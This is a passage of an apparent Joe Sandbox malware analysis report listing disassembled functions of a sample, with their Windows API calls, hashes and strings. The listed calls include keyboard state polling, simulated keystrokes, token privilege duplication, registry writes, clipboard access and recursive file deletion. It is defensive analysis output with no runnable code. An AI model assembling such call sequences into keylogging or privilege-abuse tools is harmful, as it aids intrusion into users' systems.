                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0061D70A
                                                      • keybd_event.USER32(00000012,00000000), ref: 0061D70F
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0061D719
                                                      • keybd_event.USER32(00000012,00000000), ref: 0061D71E
                                                      • SetForegroundWindow.USER32(?), ref: 0061D721
                                                      • AttachThreadInput.USER32(?,?,00000000), ref: 0061D748
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 4125248594-2988720461
                                                      • Opcode ID: bec7c6947caaef9b00e9c57d252485887dbdefd7846b5d5c4cdccc9ae57d7f02
                                                      • Instruction ID: 066aaeeaec68bcc1e3e5229e30963d92f9dc9489d9aab33316ac03197f133ed8
                                                      • Opcode Fuzzy Hash: bec7c6947caaef9b00e9c57d252485887dbdefd7846b5d5c4cdccc9ae57d7f02
                                                      • Instruction Fuzzy Hash: 01319471A40318BBEB206F61AC49FBF7F6EEB44B50F145025FA05EA1D1CAF05D41ABA1
                                                      APIs
                                                        • Part of subcall function 006387E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0063882B
                                                        • Part of subcall function 006387E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00638858
                                                        • Part of subcall function 006387E1: GetLastError.KERNEL32 ref: 00638865
                                                      • _memset.LIBCMT ref: 00638353
                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 006383A5
                                                      • CloseHandle.KERNEL32(?), ref: 006383B6
                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 006383CD
                                                      • GetProcessWindowStation.USER32 ref: 006383E6
                                                      • SetProcessWindowStation.USER32(00000000), ref: 006383F0
                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0063840A
                                                        • Part of subcall function 006381CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00638309), ref: 006381E0
                                                        • Part of subcall function 006381CB: CloseHandle.KERNEL32(?,?,00638309), ref: 006381F2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                      • String ID: $default$winsta0
                                                      • API String ID: 2063423040-1027155976
                                                      • Opcode ID: a86557d3e4edce03e856c637db0253901ca08dc26dab936ec1375933a5ed8909
                                                      • Instruction ID: dcfd7d734ac4d16782d007bf47004605d365bcc7e30699b9eeead66aed2a200a
                                                      • Opcode Fuzzy Hash: a86557d3e4edce03e856c637db0253901ca08dc26dab936ec1375933a5ed8909
                                                      • Instruction Fuzzy Hash: 888168B2900309AFDF519FA4DC45AEEBBBAFF04314F144169F910A72A1DB718E14DBA0
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0064C78D
                                                      • FindClose.KERNEL32(00000000), ref: 0064C7E1
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0064C806
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0064C81D
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0064C844
                                                      • __swprintf.LIBCMT ref: 0064C890
                                                      • __swprintf.LIBCMT ref: 0064C8D3
                                                        • Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22
                                                      • __swprintf.LIBCMT ref: 0064C927
                                                        • Part of subcall function 00603698: __woutput_l.LIBCMT ref: 006036F1
                                                      • __swprintf.LIBCMT ref: 0064C975
                                                        • Part of subcall function 00603698: __flsbuf.LIBCMT ref: 00603713
                                                        • Part of subcall function 00603698: __flsbuf.LIBCMT ref: 0060372B
                                                      • __swprintf.LIBCMT ref: 0064C9C4
                                                      • __swprintf.LIBCMT ref: 0064CA13
                                                      • __swprintf.LIBCMT ref: 0064CA62
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                      • API String ID: 3953360268-2428617273
                                                      • Opcode ID: ebc93aab1897365ef8ff909b54e333fb7c9d7f5f49eaec6a381a1a771a86ce87
                                                      • Instruction ID: 7d5c08b49e1f77d528540224106f9adc6376224d589534f239100a433a7108c5
                                                      • Opcode Fuzzy Hash: ebc93aab1897365ef8ff909b54e333fb7c9d7f5f49eaec6a381a1a771a86ce87
                                                      • Instruction Fuzzy Hash: 88A12DB1408245ABC754EFA5C889DAFBBEDFF95704F400929F585C7291EB31DA08CB62
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 0064EFB6
                                                      • _wcscmp.LIBCMT ref: 0064EFCB
                                                      • _wcscmp.LIBCMT ref: 0064EFE2
                                                      • GetFileAttributesW.KERNEL32(?), ref: 0064EFF4
                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 0064F00E
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0064F026
                                                      • FindClose.KERNEL32(00000000), ref: 0064F031
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0064F04D
                                                      • _wcscmp.LIBCMT ref: 0064F074
                                                      • _wcscmp.LIBCMT ref: 0064F08B
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0064F09D
                                                      • SetCurrentDirectoryW.KERNEL32(00698920), ref: 0064F0BB
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0064F0C5
                                                      • FindClose.KERNEL32(00000000), ref: 0064F0D2
                                                      • FindClose.KERNEL32(00000000), ref: 0064F0E4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                      • String ID: *.*
                                                      • API String ID: 1803514871-438819550
                                                      • Opcode ID: 70a7aecb3e54c977541834d11498cc7970ffbf202ec7c2605272c2216b8cf44e
                                                      • Instruction ID: aed053ca0b8faeb9b5ecaee9b78da54441947ca1acbb4cb28171a6f55c517e02
                                                      • Opcode Fuzzy Hash: 70a7aecb3e54c977541834d11498cc7970ffbf202ec7c2605272c2216b8cf44e
                                                      • Instruction Fuzzy Hash: A131C3325012196EDB14DFA4EC68AEE77AE9F89760F100176E804E32A1DBB1DA44CF65
                                                      APIs
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00660953
                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0066F910,00000000,?,00000000,?,?), ref: 006609C1
                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00660A09
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00660A92
                                                      • RegCloseKey.ADVAPI32(?), ref: 00660DB2
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00660DBF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectCreateRegistryValue
                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                      • API String ID: 536824911-966354055
                                                      • Opcode ID: ac4d7d68deea2869b1e2ec457e71a8f97132489864b5a347f6b85e502a1bd179
                                                      • Instruction ID: ee0c54a106a49ab6535d8467cdd840cf08f162080caa87c86a61238a0b8b5450
                                                      • Opcode Fuzzy Hash: ac4d7d68deea2869b1e2ec457e71a8f97132489864b5a347f6b85e502a1bd179
                                                      • Instruction Fuzzy Hash: A60238756046429FDB58DF15C855A6BBBE6FF89314F04856CF88A9B3A2DB30EC01CB81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0Dh$0Eh$0Fh$3c_$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGh$__
                                                      • API String ID: 0-4200035643
                                                      • Opcode ID: ee07f29342c8ab17ca7998ba13a6977a5bd2a471822c2b7dcaf5902ebac45b07
                                                      • Instruction ID: b528b352dced2a8901c003d3dc2d5442010264440aa849d028013fff7eb2915f
                                                      • Opcode Fuzzy Hash: ee07f29342c8ab17ca7998ba13a6977a5bd2a471822c2b7dcaf5902ebac45b07
                                                      • Instruction Fuzzy Hash: 25724C75E00219DADB14DF58C8817FEBBB6FF49310F14816AE945EB291EB349E81CB90
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 0064F113
                                                      • _wcscmp.LIBCMT ref: 0064F128
                                                      • _wcscmp.LIBCMT ref: 0064F13F
                                                        • Part of subcall function 00644385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 006443A0
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0064F16E
                                                      • FindClose.KERNEL32(00000000), ref: 0064F179
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0064F195
                                                      • _wcscmp.LIBCMT ref: 0064F1BC
                                                      • _wcscmp.LIBCMT ref: 0064F1D3
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0064F1E5
                                                      • SetCurrentDirectoryW.KERNEL32(00698920), ref: 0064F203
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0064F20D
                                                      • FindClose.KERNEL32(00000000), ref: 0064F21A
                                                      • FindClose.KERNEL32(00000000), ref: 0064F22C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                      • String ID: *.*
                                                      • API String ID: 1824444939-438819550
                                                      • Opcode ID: 529980b1cd466413e844897aed8a57ee31feb5d0471339703385386ba99fcee7
                                                      • Instruction ID: c5af83d503df078f7f8a85add047be284ac74791144d6778508bef38b163610b
                                                      • Opcode Fuzzy Hash: 529980b1cd466413e844897aed8a57ee31feb5d0471339703385386ba99fcee7
                                                      • Instruction Fuzzy Hash: 1F31E5365012197EDF14AFA4EC59AEF77AE9F45360F100175E800E32A0DBB1DF45CA58
                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0064A20F
                                                      • __swprintf.LIBCMT ref: 0064A231
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0064A26E
                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0064A293
                                                      • _memset.LIBCMT ref: 0064A2B2
                                                      • _wcsncpy.LIBCMT ref: 0064A2EE
                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0064A323
                                                      • CloseHandle.KERNEL32(00000000), ref: 0064A32E
                                                      • RemoveDirectoryW.KERNEL32(?), ref: 0064A337
                                                      • CloseHandle.KERNEL32(00000000), ref: 0064A341
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                      • String ID: :$\$\??\%s
                                                      • API String ID: 2733774712-3457252023
                                                      • Opcode ID: 73f19ad42c9cd31c106209b091f5c0667ae9a74917d2010cab6d1f52e71fea74
                                                      • Instruction ID: 0daedb193711ec338266bb0264ca13311bd9d0d50b7edf71a99dd6749e0b75ba
                                                      • Opcode Fuzzy Hash: 73f19ad42c9cd31c106209b091f5c0667ae9a74917d2010cab6d1f52e71fea74
                                                      • Instruction Fuzzy Hash: 1831B2B1540109BBDB219FA0DC49FEB77BEEF89740F1041B6F508D2260EBB197448B65
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00640097
                                                      • SetKeyboardState.USER32(?), ref: 00640102
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00640122
                                                      • GetKeyState.USER32(000000A0), ref: 00640139
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00640168
                                                      • GetKeyState.USER32(000000A1), ref: 00640179
                                                      • GetAsyncKeyState.USER32(00000011), ref: 006401A5
                                                      • GetKeyState.USER32(00000011), ref: 006401B3
                                                      • GetAsyncKeyState.USER32(00000012), ref: 006401DC
                                                      • GetKeyState.USER32(00000012), ref: 006401EA
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00640213
                                                      • GetKeyState.USER32(0000005B), ref: 00640221
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: dc1be5b4f1173eecee486a212440d65fdb16657c1257690974bfd277d3e3603b
                                                      • Instruction ID: 25f2243bad3936aa3a70a183d182a500c3af11ff471bd4f2c7fe2428c5fc4cd5
                                                      • Opcode Fuzzy Hash: dc1be5b4f1173eecee486a212440d65fdb16657c1257690974bfd277d3e3603b
                                                      • Instruction Fuzzy Hash: D951EE3090479829FB35DBB088547EABFB69F01780F08459DD6C25B6C3DAB49B8CCB61
                                                      APIs
                                                        • Part of subcall function 00660E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0065FDAD,?,?), ref: 00660E31
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006604AC
                                                        • Part of subcall function 005E9837: __itow.LIBCMT ref: 005E9862
                                                        • Part of subcall function 005E9837: __swprintf.LIBCMT ref: 005E98AC
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0066054B
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006605E3
                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00660822
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0066082F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 1240663315-0
                                                      • Opcode ID: 50938e1c1edfe743c75c9fdec27ea78d004087a210681db49a8519e8bdd921f1
                                                      • Instruction ID: ea83b61a20bed16e225762054ed1db4dcbad37fdfae60b0df3b5755b201b4aed
                                                      • Opcode Fuzzy Hash: 50938e1c1edfe743c75c9fdec27ea78d004087a210681db49a8519e8bdd921f1
                                                      • Instruction Fuzzy Hash: 75E14C71204205AFDB14DF25C895E6BBBE9FF89314F04856DF88ADB261DA31ED01CB91
                                                      APIs
                                                        • Part of subcall function 005E9837: __itow.LIBCMT ref: 005E9862
                                                        • Part of subcall function 005E9837: __swprintf.LIBCMT ref: 005E98AC
                                                      • CoInitialize.OLE32 ref: 00658403
                                                      • CoUninitialize.OLE32 ref: 0065840E
                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00672BEC,?), ref: 0065846E
                                                      • IIDFromString.OLE32(?,?), ref: 006584E1
                                                      • VariantInit.OLEAUT32(?), ref: 0065857B
                                                      • VariantClear.OLEAUT32(?), ref: 006585DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                      • API String ID: 834269672-1287834457
                                                      • Opcode ID: 880e7a3ddbf7341b2d5c9ea5a8329eab00fbcd09b09b87462c4314ab358fe80b
                                                      • Instruction ID: db63f73d2277769f55f0c1bf78e51e4f5f33e6d5db0a5898016476d8ddf8e1b9
                                                      • Opcode Fuzzy Hash: 880e7a3ddbf7341b2d5c9ea5a8329eab00fbcd09b09b87462c4314ab358fe80b
                                                      • Instruction Fuzzy Hash: 2F61BC706083129FC710DF14C848B6ABBEAAF89755F00445DFD86AB6A1DB70ED49CB92
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                      • String ID:
                                                      • API String ID: 1737998785-0
                                                      • Opcode ID: 2e717229d6bf85db0bed7948f822a260fff53f8587319b9536ca12ab52fc121f
                                                      • Instruction ID: 2dc51c3978f0b9262d068b3bbc7b6e0e32fc67f663f6bbfe8a4958227c4b7c39
                                                      • Opcode Fuzzy Hash: 2e717229d6bf85db0bed7948f822a260fff53f8587319b9536ca12ab52fc121f
                                                      • Instruction Fuzzy Hash: 4C21D3352006119FDB10AF60EC09B6D7BAAFF44751F108069F986DB2B1CBB0AD41CB95
                                                      APIs
                                                        • Part of subcall function 005E4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005E4743,?,?,005E37AE,?), ref: 005E4770
                                                        • Part of subcall function 00644A31: GetFileAttributesW.KERNEL32(?,0064370B), ref: 00644A32
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 006438A3
                                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0064394B
                                                      • MoveFileW.KERNEL32(?,?), ref: 0064395E
                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0064397B
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0064399D
                                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 006439B9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 4002782344-1173974218
                                                      • Opcode ID: ddf297d9c6341caac0e6dd3b25eb3a74fb5c48a13a2a4f04a84bdc01aea3bfff
                                                      • Instruction ID: 38e0eb176b73fb3b72e26a6616894b63ca03a388de4baa0954df1c6b97934425
                                                      • Opcode Fuzzy Hash: ddf297d9c6341caac0e6dd3b25eb3a74fb5c48a13a2a4f04a84bdc01aea3bfff
                                                      • Instruction Fuzzy Hash: 7751B33180419D9ACF09EFA1D9969EDBB7ABF54304F600069F446B7292EF716F09CB50
                                                      APIs
                                                        • Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22
                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0064F440
                                                      • Sleep.KERNEL32(0000000A), ref: 0064F470
                                                      • _wcscmp.LIBCMT ref: 0064F484
                                                      • _wcscmp.LIBCMT ref: 0064F49F
                                                      • FindNextFileW.KERNEL32(?,?), ref: 0064F53D
                                                      • FindClose.KERNEL32(00000000), ref: 0064F553
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
